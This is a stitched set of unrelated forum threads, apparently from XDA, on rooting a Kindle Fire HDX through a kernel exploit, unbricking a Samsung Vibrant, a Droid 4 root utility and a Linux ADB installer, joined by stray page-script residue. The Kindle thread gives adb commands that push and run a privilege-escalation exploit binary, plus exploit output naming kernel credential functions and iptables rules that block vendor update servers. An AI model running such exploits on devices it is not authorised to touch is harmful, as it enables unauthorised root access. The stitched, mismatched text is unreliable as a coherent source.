Please do not donate to me for this, it is not my original work. If you want to donate, I suggest finding a way to donate to fi01 (not aware of a way or if he accepts them) or donating to a charity. It is the holiday times, maybe a toys for tots or something similar. I know a lot of ppl dislike the salvation army, and I can't stand up with some of the things they do, but their toy donation program is good and they do get the toys to kids who really have no other option, maybe drop off some new toys? May be food to a food bank?
Source: https://github.com/hiikezoe/android_run_root_shell
Vuln:
https://www.codeaurora.org/projects...hecks-putusergetuser-kernel-api-cve-2013-6282
Exploit Source:
https://github.com/fi01/libput_user_exploit
Beaups compiled it at my request for you guys.
adb push su /data/local/tmp/
adb push rootme.sh /data/local/tmp/
adb push exploit /data/local/tmp/
adb shell chmod 755 /data/local/tmp/rootme.sh
adb shell chmod 755 /data/local/tmp/exploit
adb shell /data/local/tmp/exploit -c "/data/local/tmp/rootme.sh"
Bomb! You are the man!
Bro, I am going to PM you shortly. I would like to thank you & fi01. I will donate to both of you, or if you both prefer, I will donate my original pledge of $150 for root in your names to whatever charity you think is appropriate. If this leads to an unlocked BL, I will double my donation, to the $300 I originally stated in the General/Kernel thread.
If you notice my signature, I have an issue I have become intimately involved in, so if there is something near & dear to your two hearts, just let me know.
PROOF OF ROOT:
{
"lightbox_close": "Close",
"lightbox_next": "Next",
"lightbox_previous": "Previous",
"lightbox_error": "The requested content cannot be loaded. Please try again later.",
"lightbox_start_slideshow": "Start slideshow",
"lightbox_stop_slideshow": "Stop slideshow",
"lightbox_full_screen": "Full screen",
"lightbox_thumbnails": "Thumbnails",
"lightbox_download": "Download",
"lightbox_share": "Share",
"lightbox_zoom": "Zoom",
"lightbox_new_window": "New window",
"lightbox_toggle_sidebar": "Toggle sidebar"
}
GSLEON3 said:
Bomb! You are the man!
Bro, I am going to PM you shortly. I would like to thank you & fi01. I will donate to both of you, or if you both prefer, I will donate my original pledge of $300 in your names to whatever charity you think is appropriate.
If you notice my signature, I have an issue I have become intimately involved in, so if there is something near & dear to your two hearts, just let me know.
PROOF OF ROOT:
Click to expand...
Click to collapse
Awesome! How did you flash it? Is there a stock recovery mode or did you have to use ADB? I'm not familiar with ADB at all, so I'm hoping for a simple way of flashing this. Did you have the Fire OS update installed when you rooted it?
Guess it does not work on 7" (fire os 3.1 updated, ver 13.3.1.0):
Device detected: KFTHWI (JDQ39)
Try to find address in memory...
Attempt msm_cameraconfig exploit...
Detected kernel physical address at 0x00008000 form iomem
Attempt fb_mem exploit...
Detected kernel physical address at 0x00008000 form iomem
You need to manage to get remap_pfn_range addresses.
Failed to get prepare_kernel_cred addresses.
Failed to get commit_creds addresses.
Failed to get ptmx_fops addresses.
KFTHWI (JDQ39) is not supported.
Failed to setup variables.
Have hopes it will be possible soon enough though
Maverick777 said:
Awesome! How did you flash it? Is there a stock recovery mode or did you have to use ADB? I'm not familiar with ADB at all, so I'm hoping for a simple way of flashing this.
Click to expand...
Click to collapse
I am going to tak as many questions as possible, but will probably do something in the Q&A section to keep this clean. Right now, this is a manual adb exploit, though if you have a rooted device & USB OTG, you can use root transmission. Currently, it is fairly easy & straight forward, but you will need adb to utilize this root method. jcase said we could package it into a one click, but that is going to take some time.
At this point, there are no custome roms & there are no custom recoveries, just root access. I also have the Play Store working, which was just a matter of changing the ro.build.host to point to Google. Again, no easy way to do it yet. Since you are asking about "flashing" this, I would suggest you wait. Either that, or go back & read about some of the old root methods & how to use ADB. There is no flashing this file. You use ADB to push the files, & shell to change owner/permissions. You then run a script (again via adb) that moves the SU binary into xbin. Currently, there is still a bit of a trick to get SU going, but it is pretty easy if you understand the basics of ADB.
Really, what this means is that now the gates have been cracked & it is possible to start building recoveries, roms & all that good stuff.
---------- Post added at 11:21 AM ---------- Previous post was at 11:17 AM ----------
Epedemic said:
Guess it does not work on 7" (fire os 3.1 updated, ver 13.3.1.0):
Device detected: KFTHWI (JDQ39)
Try to find address in memory...
Attempt msm_cameraconfig exploit...
Detected kernel physical address at 0x00008000 form iomem
Attempt fb_mem exploit...
Detected kernel physical address at 0x00008000 form iomem
You need to manage to get remap_pfn_range addresses.
Failed to get prepare_kernel_cred addresses.
Failed to get commit_creds addresses.
Failed to get ptmx_fops addresses.
KFTHWI (JDQ39) is not supported.
Failed to setup variables.
Have hopes it will be possible soon enough though
Click to expand...
Click to collapse
Most likely, it is going to take a little address rework of the exploit. I am about 100% certain the exploit is there though.
GSLEON3 said:
I am going to tak as many questions as possible, but will probably do something in the Q&A section to keep this clean. Right now, this is a manual adb exploit, though if you have a rooted device & USB OTG, you can use root transmission. Currently, it is fairly easy & straight forward, but you will need adb to utilize this root method. jcase said we could package it into a one click, but that is going to take some time.
At this point, there are no custome roms & there are no custom recoveries, just root access. I also have the Play Store working, which was just a matter of changing the ro.build.host to point to Google. Again, no easy way to do it yet. Since you are asking about "flashing" this, I would suggest you wait. Either that, or go back & read about some of the old root methods & how to use ADB. There is no flashing this file. You use ADB to push the files, & shell to change owner/permissions. You then run a script (again via adb) that moves the SU binary into xbin. Currently, there is still a bit of a trick to get SU going, but it is pretty easy if you understand the basics of ADB.
Really, what this means is that now the gates have been cracked & it is possible to start building recoveries, roms & all that good stuff.
Click to expand...
Click to collapse
Awesome. Thanks for the explanation. I will wait for a one click method or recovery to be made unless I get impatient.
Epedemic said:
Guess it does not work on 7" (fire os 3.1 updated, ver 13.3.1.0):
Device detected: KFTHWI (JDQ39)
Try to find address in memory...
Attempt msm_cameraconfig exploit...
Detected kernel physical address at 0x00008000 form iomem
Attempt fb_mem exploit...
Detected kernel physical address at 0x00008000 form iomem
You need to manage to get remap_pfn_range addresses.
Failed to get prepare_kernel_cred addresses.
Failed to get commit_creds addresses.
Failed to get ptmx_fops addresses.
KFTHWI (JDQ39) is not supported.
Failed to setup variables.
Have hopes it will be possible soon enough though
Click to expand...
Click to collapse
No but download the update.bin for your firmware from amazon, send me boot.img and system/build.prop and will port it
Congratulations @jcase on the hard work you put in for us. As a freshman computer engineering student it's things like this that make me want to work harder at my studies, put in that extra time studying for that test, seeking out opportunities my professors give, and hopefully being able to give back to XDA as much as you do. I doubt I'll ever get there but it's worth trying , great job again man :highfive:.
jcase said:
No but download the update.bin for your firmware from amazon, send me boot.img and system/build.prop and will port it
Click to expand...
Click to collapse
Update is here: http://www.amazon.com/gp/help/customer/display.html/ref=hp_left_v4_sib?ie=UTF8&nodeId=201357190
I extracted build.prop and it can be found here: https://www.dropbox.com/sh/t9wv1aakvopwpyt/r9nQD3x0Ux
Not sure how to extract boot.img, unless the .bin file from amazon is simply an archive. (in that case it will be on the dropbox link shortly )
Epedemic said:
Update is here: http://www.amazon.com/gp/help/customer/display.html/ref=hp_left_v4_sib?ie=UTF8&nodeId=201357190
I extracted build.prop and it can be found here: https://www.dropbox.com/sh/t9wv1aakvopwpyt/r9nQD3x0Ux
Not sure how to extract boot.img, unless the .bin file from amazon is simply an archive. (in that case it will be on the dropbox link shortly )
Click to expand...
Click to collapse
@Epedemic - The .bin is an archive.
GSLEON3 said:
@Epedemic - The .bin is an archive.
Click to expand...
Click to collapse
Thanks! Boot.img is on the dropbox link as well now
Epedemic said:
Thanks! Boot.img is on the dropbox link as well now
Click to expand...
Click to collapse
Hope we get the HDX7 13.3.1.0 Root soon, cant wait to get the Playstore on my HDX
BTW i will be going to sleep in a couple of hours at the latest, and then vacation until friday. But i am sure you can find someone else to test the 7" version
Epedemic said:
BTW i will be going to sleep in a couple of hours at the latest, and then vacation until friday. But i am sure you can find someone else to test the 7" version
Click to expand...
Click to collapse
No worries if something gets posted tonight I will test it out my hdx 7.
You can send it to me for testing no problem
Gesendet von meinem Nexus 4 mit Tapatalk
Thanks for root jcase!
If you really don't want my part of the money I put up for achieving root then I will do as you suggested and donate it to charity
Awwwwwwwwwwwwwwwwe shet! Root - root. Thank you to those who made this happen.
Dude!!! You guys are the best!! I get mine (HDX 7") in December, so I hope by then to have an easy root method and maybe even a rom or two. :good:
Just in case Amazon fixes the exploit in an update I have blocked the update servers from getting through my router.
The IPs below are the update servers in case anyone else wants to block them.
Code:
72.21.194.208
176.32.100.136
72.21.195.233
If you have a dd-wrt router just add this to your firewall
Code:
iptables -I FORWARD -d 72.21.194.208 -j DROP
iptables -I FORWARD -d 176.32.100.136 -j DROP
iptables -I FORWARD -d 72.21.195.233 -j DROP
Bitcoin Address: 186NWvr3buDGmpa5ECVGub37YX94NMSsLj
kholdstare said:
Just in case Amazon fixes the exploit in an update I have blocked the update servers from getting through my router.
The IPs below are the update servers in case anyone else wants to block them.
Code:
72.21.194.208
176.32.100.136
72.21.195.233
If you have a dd-wrt router just add this to your firewall
Code:
iptables -I FORWARD -d 72.21.194.208 -j DROP
iptables -I FORWARD -d 176.32.100.136 -j DROP
iptables -I FORWARD -d 72.21.195.233 -j DROP
Bitcoin Address: 186NWvr3buDGmpa5ECVGub37YX94NMSsLj
Click to expand...
Click to collapse
Can't Amazon just change the update server addresses to circumvent this? Assuming they care enough about this to patch it quickly, wouldn't they try to get updates through anyway they can? Or do Kindle updates only listen to a specific set of addresses? The HD's allowed a downgrade, do the HDX's prevent downgrade? The mind is ablur with possibilities.
Related
{
"lightbox_close": "Close",
"lightbox_next": "Next",
"lightbox_previous": "Previous",
"lightbox_error": "The requested content cannot be loaded. Please try again later.",
"lightbox_start_slideshow": "Start slideshow",
"lightbox_stop_slideshow": "Stop slideshow",
"lightbox_full_screen": "Full screen",
"lightbox_thumbnails": "Thumbnails",
"lightbox_download": "Download",
"lightbox_share": "Share",
"lightbox_zoom": "Zoom",
"lightbox_new_window": "New window",
"lightbox_toggle_sidebar": "Toggle sidebar"
}
Introduction:
After months of research and development, both hardware and software... I'm happy to announce UnBrickable Mod is a matter of modifing your phone once, with a single small wire. From that point on, you can click a button to unbrick. This can even be applied to a phone which is already bricked.
This is an example from the Captivate. The procedure is the same on the Vibrant.
Instructions
You Must have UnBrickable Mod applied to your device. If you're not sure, run this tool under Linux: http://forum.xda-developers.com/showthread.php?t=1257434
This currently only works for Linux based computers or Windows based computers with proper drivers installed, with a Linux Virtual Machine, Get Ubuntu here: http://www.ubuntu.com , Get Virtualbox Here: http://www.virtualbox.org/wiki/Downloads
You must have Java installed on your computer: http://www.java.com/en/download/
Unbricking:
1. Apply UnBrickable Mod to your device:http://forum.xda-developers.com/showthread.php?t=1273083
2. Run UnBrickable Resurrector: Get it from THIS POST: http://forum.xda-developers.com/showthread.php?p=17135277#post17135277 This will only work on linux currently. Install Linux or dual boot if you have windows.
3. Run Heimdall One-Click http://forum.xda-developers.com/showthread.php?t=1278683
4. repeat steps 2 and 3 with bootloader flashing enabled (Heimdall One-Click has a safety mechanism which requires you to flash once before flashing bootloaders).
conclusion
You've unbricked the unbrickable captivate... This should not have been difficult. If it was, you should learn teh computer better... Really. And with that said, I'm happy to announce that you no longer have to flash with a fear of bricking.
HIBL
The HIBL is the key to resurrecting a S5PC110 based processor. I'm going to let Rebellos explain the inner workings of the Hummingbird Interceptor Bootloader. It's really quite amazing. While my work is more hardware and high level tasks like making things into one-clicks, Rebellos' work involves reverse software engineering, assembly language, and more...
Rebellos said:
Okay, so, what is Hummingbird Interceptor Boot Loader (HIBL)?
Basically: It allows to load any amount of data (limited by size of RAM block, the biggest one single block available is 256MB) through USB connection with PC under any specified address into memory and then execute it.
Technically: It does consist of 2 pieces fused together - BL1_stage1 and BL1_stage2.
Each stage starts from 16bytes (4 ARM WORDs) of secure boot header. In stage1 these are mandatory, in stage2 they can be random (nulled them in my code), so EntryPoint of each stage does start at its 0x10 offset.
BL1_stage1, loaded under 0xD0020000 address, is short code, digitally signed by Samsung. It has been released to break "Chain of Trust" and alter Secure Boot into Non-Secure Boot process. Literally stage1 just do some compare operations and then jumpout to BL1_stage2. (Yes, I also see no point of releasing hardware secured CPU version together with software which is bypassing it's security)
BL1_stage2, must be placed at 0xD0022000 address (it's fused together with stage1 into HIBL, so it's at 0x2000 offset of HIBL.bin) it is unsigned because Secure Boot Context, prepared by iROM (BL0) has been already ignored by stage1.
Its FASM_ARM sourcecode:
http://code.google.com/p/hummingbir...unk/HummingBirdInterceptorBootloader/HIBL.ASM
This is where the code start real work, it does begin with standard ARM core jump vector table (just to keep stick to standard, these aren't used anyway).
1. It does use I9000 BL1_stage2 functions (init_system) which I linked to it, these are used to init DMC controllers, as to this point code is executing in and working with very tiny, 96KB iRAM space, after calling this function it turns all 512MB of RAM available.
2. Make sure DMC is configured properly (write some value to address 0x40~~ memory space, then read it and compare with previously written)
3. Reinit iRAM heap to the BL0 initial state (to convince it USB dload mode haven't been called yet), by storing and restoring UART pointer only (to keep debug output flowing properly)
4. Call iROM usb_downloader function.
5. Read the address where downloaded data has been placed.
6. Jump into this address.
This, properly used provides similiar debug output (similiar, because its outdated testlog)
Code:
�������������������������������������������������� ����������������������
Uart negotiation Error
----------------------------------------
Hummingbird Interceptor Boot Loader (HIBL) v1.0
Copyright (C) Rebellos 2011
----------------------------------------
Calling IBL Stage2
DONE!
Testing BL3 area
DONE!
iRAM reinit
DONE!
Please prepare USB dltool with BL3
Starting download...
0x00000000
Desired BL3 EP: 0x40244000
Download complete, hold download mode key combination.
Starting BL3...
//OUTPUT BELOW IS COMING FROM SBL
Set cpu clk. from 400MHz to 800MHz.
IROM e-fused - Non Secure Boot Version.
It opens infinite capabilities. Instead of SBL to unbrick, Uboot can be loaded, or any armlinux kernel. It's all up to you - XDA Developers.
Click to expand...
Click to collapse
Tools
Windows32 command line app and drivers http://forum.xda-developers.com/attachment.php?attachmentid=709292&d=1315091521 (doesn't work very well... just want you to know this)
Linux one-click Resurrector: http://forum.xda-developers.com/attachment.php?attachmentid=712232&d=1315349672
Wow. i mark it! thank you for your great work!
I just resurrected a Vibrant today using the method above. This tested great. No problems to note at all.
Here's a picture of my work http://forum.xda-developers.com/showthread.php?p=17896376#post17896376
This is slightly more difficult then a captivate because there is no room to work around the resistors.
thanks to you i finally got my vibrant unbricked thanks a lot for this .....................
Aneez1990 said:
thanks to you i finally got my vibrant unbricked thanks a lot for this .....................
Click to expand...
Click to collapse
You're welcome. Glad this helped.
Very sexy work... its nice to have this as a backup and itll be Very nice once people develop ffirmware to work with the unbrickable mod, like nexus s bootloaders or wp7 or iOs or whatever... thanks again
Sent from a cell tower to the XDA server to you.
younix258 said:
Very sexy work... its nice to have this as a backup and itll be Very nice once people develop ffirmware to work with the unbrickable mod, like nexus s bootloaders or wp7 or iOs or whatever... thanks again
Sent from a cell tower to the XDA server to you.
Click to expand...
Click to collapse
I'd like to see Ubuntu. Turn these devices into a lamp server or security/web cam orsomething when were done with them.
I would also like to see work on Ubuntu. is there any work being done for that? I'm still thinking about getting the UB mod sometime soon.
Hey guys Im having a problem with step #2. It says to download Unbrickable Resurector but this post is the HIBL post with no "Unbrickable resurector" download link. Is that just an error or do I just download the file listed on the previous post called "UltimateUnbrickResurector.zip"? Thanks for any clarification...
Also, when I launch the resurector on the previous post I get the following error smdk-usbdl: not found. Do I need to have Heimdall running prior to launching the resurector? Thanks again...
Code:
Please wait.... Uploading..
-------------------------------------------------------------
Hummingbird Interceptor Boot Loader (HIBL) v1.0
Copyright (C) Rebellos 2011
-------------------------------------------------------------
Building command list
Building command list
Requesting Permission to access device/tmp/skorpnHeimdallOneClick51336EBC/Script.sh: 3: /tmp/skorpnHeimdallOneClick51336EBC/UnBrickPack/smdk-usbdl: not found
Moved this post to the "Mod" thread.
The Resurrector is not working, either because the mod was done incorrectly, or my Ubuntu machine has been setup wrong. The Resurrector keeps giving me the smdk-usbdl: not found error, but the file exists. My best guess is that the Mod was done incorrectly, either that or my Linux box is being a pain... Also noticed adb not working as well.
EDIT: Im going to go out on a limb and say this error is telling me the "usb device" has not been found, which would mean my mod did not take.
edit never mind found the answer was just wondering if it were possible to learn the wielding part of the guide on the internet and such also what type of tools would i need please and thank you
dohandrew said:
edit never mind found the answer was just wondering if it were possible to learn the wielding part of the guide on the internet and such also what type of tools would i need please and thank you
Click to expand...
Click to collapse
If you're asking, you will want to find someone more experienced.
i see where would u suggest going to ? im located in california i dont really know of a place that does welding on phones
Adam will do it for $30 + shipping, PM him.
Atleast thats what hes said (correct me if im wrong)
Adam, did you say you can do this mod for $30 + s&h?
Also, Im wondering if you upgraded to Ubuntu 11.10 yet? I just decided to upgrade before even thinking about it possibly effecting the mode detect, heimdal one click or the resurrector. You think the upgrade can break these apps any?
SkOrPn said:
Adam, did you say you can do this mod for $30 + s&h?
Also, Im wondering if you upgraded to Ubuntu 11.10 yet? I just decided to upgrade before even thinking about it possibly effecting the mode detect, heimdal one click or the resurrector. You think the upgrade can break these apps any?
Click to expand...
Click to collapse
Yes I do. No it doesn't.
AdamOutler said:
Yes I do. No it doesn't.
Click to expand...
Click to collapse
Excellent Im on 11.10, and thanks for the info...
I was able to remove the resistor and replace it with another resistor from an old samsung phone. I used a circuit writer pen from radio shack, it lays down a conductive polymer, which I used to adhere the new resistor onto the bottom spot on the board. "the resistors are so small I could not imagine being able to do this with a soldering iron. I would have probably shorted something out because the amount of solder that needs to be laid down might not even fit on an ants back (seriously!)"
Another note: when using resurector, my phone only went into download mode if I pressed on "only" the volume down button.-I hope this helps someone out there with a brick like the one I had.
Does that mean after applying this mod the vibrant will never brick at any cause ???
galaxyfitftw said:
Does that mean after applying this mod the vibrant will never brick at any cause ???
Click to expand...
Click to collapse
yes that is the meaning of this mod....is just awesome
Hey all! This is the new home of the Droid 4 Utility (NOW WITH SAFESTRAP THANKS TO HASHCODE) for Windows/Mac/Linux!
There are (still) no fastboot files as of writing this (2/28/2012) so use Safestrap at your own risk
Once they come out I will be making a full version that includes fastboot restore. For now, the utility is only a few MB compared to a GB+.
From this point forward I will be taking charge of updating the Droid 4 Utility for Windows/Mac/Linux
This way mattlgroff has a little less work on his hands and can focus more on IMPORTANT things like bootloaders, ICS, etc...
MAC/LINUX: Be sure to read the instructions below (or README file) if you are not familiar with using terminal as root or executing bash scripts!
-Changes
~~as of 2/18/ 11:30PM PST
Fixed bug where Superuser.apk was pushed to /data instead of /system/app/
Fixed unroot script to properly remove Superuser.apk
~~as of 2/19 4:30 PM PST
Fixed chmod in root method from 4775 to 6775
~~as of 2/28 6:15PM PST
Added Safestrap recovery!!
~~as of 3/2
fixed script to chmod +x ./files -R so that you can actually run the files on mac and linux (that would be important huh?)
DOWNLOADS
WINDOWS
Size: 7.75 MB
MD5: f82bf8d8a085ff95b696712b8caa0f1b
Link: http://tinyw.in/KKB8
MAC
Size: 7.19 MB
MD5: dc8468d051d59963914a0b8a054b83b8
Link: http://tinyw.in/vx2A
LINUX
Size: 7.26 MB
MD5: 0c082efbff48e614b9d8ebffc7eca3eb
Link: http://tinyw.in/tpt0
Here's how:
Windows:
Simply Unzip the files, and run Droid4Windows.bat as administrator (right click>run as administrator)
Mac/Linux:
Simply extract the zip then
Code:
su
Then enter the root password NOTE: This is not YOUR password, this is the ROOT password. If you dont know it, you can always use
Code:
sudo passwd
to reset the root password
Next run:
Code:
cd /the path to where you extracted the files/
for example, heres what I have to type:
Code:
cd /home/skylar/Desktop/Droid4UtilityLinux/
next run the appropriate bash script:
Code:
bash Droid4linux
OR
Code:
bash Droid4mac
I'm sorry to say I don't actually own a Droid 4, so I'm doing this blind. Please report any problems or bugs you have.
Have fun and I hope you enjoy! [/SIZE]
CLICK HERE TO DONATE
SCREENSHOTS
{
"lightbox_close": "Close",
"lightbox_next": "Next",
"lightbox_previous": "Previous",
"lightbox_error": "The requested content cannot be loaded. Please try again later.",
"lightbox_start_slideshow": "Start slideshow",
"lightbox_stop_slideshow": "Stop slideshow",
"lightbox_full_screen": "Full screen",
"lightbox_thumbnails": "Thumbnails",
"lightbox_download": "Download",
"lightbox_share": "Share",
"lightbox_zoom": "Zoom",
"lightbox_new_window": "New window",
"lightbox_toggle_sidebar": "Toggle sidebar"
}
CLICK HERE TO DONATE
I can not get this to unroot.
---------------------------------------------------------------
Easy rooting toolkit (v1.0)
UNROOTING SCRIPT
created by DooMLoRD
based heavily on FlashTool scripts (by Bin4ry and Androxyde)
Credits go to all those involved in making this possible!
---------------------------------------------------------------
MAKE SURE THAT THE SCREEN IS UNLOCKED
and if you get Superuser prompts ACCEPT/ALLOW THEM
ELSE THIS WILL NOT WORK
Note: This removes superuser from both possible locations
So seeing one error of now finding Superuser is NORMAL!
---------------------------------------------------------------
Press any key to continue . . .
--- STARTING ----
--- WAITING FOR DEVICE
The system cannot find the path specified.
--- TESTING FOR SU PERMISSIONS
MAKE SURE THAT THE SCREEN IS UNLOCKED
and if you get Superuser prompts ACCEPT/ALLOW THEM
ELSE THIS WILL NOT WORK
The system cannot find the path specified.
--- cleaning
The system cannot find the path specified.
--- pushing busybox
The system cannot find the path specified.
--- correcting permissions
The system cannot find the path specified.
--- remounting /system
MAKE SURE THAT THE SCREEN IS UNLOCKED
and if you get Superuser prompts ACCEPT/ALLOW THEM
ELSE THIS WILL NOT WORK
The system cannot find the path specified.
--- pushing unroot script
The system cannot find the path specified.
--- correcting permissions
The system cannot find the path specified.
--- executing unroot
MAKE SURE THAT THE SCREEN IS UNLOCKED
and if you get Superuser prompts ACCEPT/ALLOW THEM
ELSE THIS WILL NOT WORK
The system cannot find the path specified.
--- cleaning
The system cannot find the path specified.
--- rebooting
The system cannot find the path specified.
ALL DONE
Press any key to continue . . .
The system cannot find the path specified.
Please make a selection or hit ENTER to return:
Click to expand...
Click to collapse
prodigyweb said:
I can not get this to unroot.
Click to expand...
Click to collapse
Sounds like you aren't running this inside the folder that also contains the /files/ folder. If you have it by itself of course the path's won't find it...because you moved it or you aren't "cd" into the directory of the utility.
appears after a phone/computer reboot and canceling the ADB process in my tasks it now is rebooting the phone and working. Thanks!
prodigyweb said:
My setup is: http://i.imgur.com/Surbz.png
should it be within the adb package from android itself?
Click to expand...
Click to collapse
Is your USB Debugging Mode enabled and "Unknown Sources" in your application settings?
Hm, I turned on USB Debugging in the settings, but it's not starting up when I plug in a USB cable, and adb can't find the device. ???
highlandsun said:
Hm, I turned on USB Debugging in the settings, but it's not starting up when I plug in a USB cable, and adb can't find the device. ???
Click to expand...
Click to collapse
While your phone is plugged in, see what drivers are in device manager and remove them. Then restart your phone while its still connected through USB. See if that reinstalls all the necessary drivers and try again.
reigndropz said:
While your phone is plugged in, see what drivers are in device manager and remove them. Then restart your phone while its still connected through USB. See if that reinstalls all the necessary drivers and try again.
Click to expand...
Click to collapse
This is Linux, so no device manager. I think I needed to add the Motorola vendorID to my udev rules first, I got it working eventually. Rooted, great. Now to go and fix the character maps so I can fully use Connectbot.
highlandsun said:
This is Linux, so no device manager. I think I needed to add the Motorola vendorID to my udev rules first, I got it working eventually. Rooted, great. Now to go and fix the character maps so I can fully use Connectbot.
Click to expand...
Click to collapse
Ah ok.....how are you with deodexing? I have been trying to deodex the SystemUI but I am not having any success. I add the jars but it keeps going and going and doesnt seem to end. Soon as I get the SystemUI deodexed, I'll throw a battery percent icon here....
reigndropz said:
Ah ok.....how are you with deodexing? I have been trying to deodex the SystemUI but I am not having any success. I add the jars but it keeps going and going and doesnt seem to end. Soon as I get the SystemUI deodexed, I'll throw a battery percent icon here....
Click to expand...
Click to collapse
Hm, haven't done anything with theming tweaks. Dunno, sorry.
You need adb to be enabled at boot time, so you can adb logcat during the startup and see what failed.
By the way, the Linux archive is not immediately usable, you need to chmod +x everything under the files/ subdirectory to make them executable first.
highlandsun said:
Hm, haven't done anything with theming tweaks. Dunno, sorry.
You need adb to be enabled at boot time, so you can adb logcat during the startup and see what failed.
By the way, the Linux archive is not immediately usable, you need to chmod +x everything under the files/ subdirectory to make them executable first.
Click to expand...
Click to collapse
Hey thanks for pointing that out! I didnt notice because they were already executable on my computer. I added
Code:
chmod +x ./files -R
to the script on startup so no one should have to manually do it anymore, sorry about that
prodigyweb said:
I can not get this to unroot.
Click to expand...
Click to collapse
Make sure you have done all of the steps below
Prework
1. Plug in phone to computer.
2. Turn on USB Debugging. Menu -> Settings -> Application -> Development -> USB Debugging
3. Confirm latest Moto driver is installed. Go to Device Manager on Windows while the D4 is plugged into it and confirm you see ADB Interface listed with Mot Composite ADB Interface listed in the group. If you see that, skip #4 & #5. There are other ways to go about this, but this is the simplest and surefire way to confirm the driver is there and compatible.
4. Go get Moto driver and install it: USB and PC Charging Drivers - Motorola Mobility, Inc. USA It is an exe file that must be run and your computer has to restart when completed.
5. Go back into your Device Manager after reboot with the phone plugged in and confirm ADB Interface is there and no error exists.
Done.
I can't get this to root, it appeared to have rooted once since Superuser was installed but TBU said not root access. Now I get message " error more than one device and emulator" when I try to root again or unroot. any idea?
contemplating getting this through a client, any word on fastboot and unlocked updates?
or is the droid 4 destined to be like all other moto phones and lack a soul...
I really wanted the Photon, but dev on it was strangled to death!
Hammerfest said:
contemplating getting this through a client, any word on fastboot and unlocked updates?
or is the droid 4 destined to be like all other moto phones and lack a soul...
I really wanted the Photon, but dev on it was strangled to death!
Click to expand...
Click to collapse
The phone itself is great. Good build quality, fantastic keyboard, fast, etc. I have not heard any news on fastboot files yet. I assume it's just a matter of time but who really knows for sure. Unlock updates? As in unlock the bootloader? I don't ever expect to see that happen, personally.
Despite that, development seems to be coming along nicely with very usable AOSP CM9, AOKP, and Gummy ROMs. The relative ease with which Razr ROMs can be ported to the D4 (due to almost identical internal components) should help on that front as well as Razr development is seems very strong.
Does this Utility still work after the latest update?
I had previously rooted via this utility and had frozen a bit of bloatware w/ TB. I have since unfrozen the bloatware and unrooted. As soon as the install message pops up again I plan to run the update, but was wondering if I will be able to re-root the same way once I do that.
mancowmilitia said:
Does this Utility still work after the latest update?
I had previously rooted via this utility and had frozen a bit of bloatware w/ TB. I have since unfrozen the bloatware and unrooted. As soon as the install message pops up again I plan to run the update, but was wondering if I will be able to re-root the same way once I do that.
Click to expand...
Click to collapse
I've heard people having mixed results trying to re-root using the utility. Some seem to have no problem but others said they had to run the exploit directly. Not sure why.
I just used the Voodoo OTA Root Keeper app to hide root while the update was being applied and then restored root.
kwyrt said:
I've heard people having mixed results trying to re-root using the utility. Some seem to have no problem but others said they had to run the exploit directly. Not sure why.
I just used the Voodoo OTA Root Keeper app to hide root while the update was being applied and then restored root.
Click to expand...
Click to collapse
I installed the upgrade with no issues. I was able to re-root without complication as well. The only message I received was that the Superuser.apk installation "failed" because it was already there. Others have noted that unrooting doesn't delete the file. But, its presence did not stop my upgrade.
This time I installed Voodoo and will go that route for the next OTA.
Is there a mirror link for the Windows Utility? The download keeps timing out on me.
heres a link for an older copy
http://goo.im/apps/mattlgroff/Droid4Utility0.3.zip
The SoupKit
{
"lightbox_close": "Close",
"lightbox_next": "Next",
"lightbox_previous": "Previous",
"lightbox_error": "The requested content cannot be loaded. Please try again later.",
"lightbox_start_slideshow": "Start slideshow",
"lightbox_stop_slideshow": "Stop slideshow",
"lightbox_full_screen": "Full screen",
"lightbox_thumbnails": "Thumbnails",
"lightbox_download": "Download",
"lightbox_share": "Share",
"lightbox_zoom": "Zoom",
"lightbox_new_window": "New window",
"lightbox_toggle_sidebar": "Toggle sidebar"
}
What is SoupKit? At it's heart, SoupKit is for those who are tired of messing around with Windows and are ready to do try something that works. It was created to be "sort of" modular in that after the ADB installer has been installed, other Linux scripts can be installed and run from the command line by just typing the name of the script and without worrying about changing directories or dealing with permissions. It's intended to make the transition from Windows to Linux for Android a little bit easier.
How does it work?
The SoupKit ADB Installer --- FOR ALL KINDLE FIRES
This puts everything where it needs to be, installs any necessary dependencies, installs drivers, configures Linux to run adb and fastboot commands, puts the SoupKit in your $PATH and cleans up after itself, all while taking a fraction of the space needed for the Android SDK. What this means for you is, you will be able open any terminal window and start entering adb or fastboot commands immediately. There's no need to change directories, add sudo commands or certain operators that are confusing to command line newbies ( ./ ). You can enter commands just as you see them in tutorials. No more worrying about “ADB Offline”, “Status Unknown” or “List of devices attached ????????????????”. This alone can make a huge difference for anyone having Kindle Fire problems that can't be fixed in Windows or those who are overwhelmed by the technicalities of configuring Linux for Android.
What you need:
First, you need Linux. Don't worry, it's not as bad as you may think.
Luckily, all Linux distros are free to download and install on your computer. It can also be booted from a USB flash drive so you don't have to wipe out your current OS (although you probably should anyway). You can use a VM, but the only VM that I've found that can detect the Kindle Fire in fastboot mode is Parallels. Vmware won't cut it, and VirtualBox sure as hell won't cut it so don't waste your time with them if you ever need to do anything in fastboot (if you're bricked, you need fastboot).
Probably the best method to get Linux running for a new user is by setting up a Linux LiveUSB.
I'm not going to teach you how to set up a Linux LiveUSB, but there are plenty of FREE programs out there that will not only create a Linux LiveUSB for you, but will download your choice of distro as well, and all you need is a USB flash drive (preferably 8GB or larger). A Google search of “Linux LiveUSB” will offer plenty of choices, although, PendriveLinux seems to be a favorite among most. Just be sure to add plenty of “persistence” (1 or more gigabytes) or you will lose everything every time you reboot. And the better quality of flash drive you can use, the better it will be in the long run. Some flash drives just don't do well and can cause some file system corruption over time (not something you want to be dealing with while you're having Kindle Fire problems).
You'll also have to figure out how to boot your computer from a USB. Check your computer's BIOS manufacturer website for instructions on how to do this.
If you're using a LiveUSB, there is no root/sudo password, just hit enter.
Do not use a USB 3.0 port
Once you have Linux installed and booted, you need to make sure your Internet is working. It may take some configuration on your part but it is necessary for the SoupKit to install properly. Luckily, once you have an Internet connection in Linux, the hard part is over.
Don't put the SoupKit.zip on the USB drive before creating the LiveUSB. Instead, use the web browser to navigate to this page and download it once you have Linux running and your Internet connected. Once it's downloaded, you'll likely find it in your Downloads folder.
SoupKit has been tested extensively on all the latest versions of Ubuntu and Mint, but it hasn't really been tested on anything outside of that. Try other distros if you will, but be warned.
To install:
Right-click the “SoupKit.zip”, select “Extract here” open the SoupKit folder and follow the instructions in the README.
Credits:
Don't worry. I didn't forget about you guys. I'll finish this when I have time. In the meantime, you know who you are, and thank you.
Is that all?
NOPE. What SoupKit would be complete without a little something to go with it? SEE POST #2
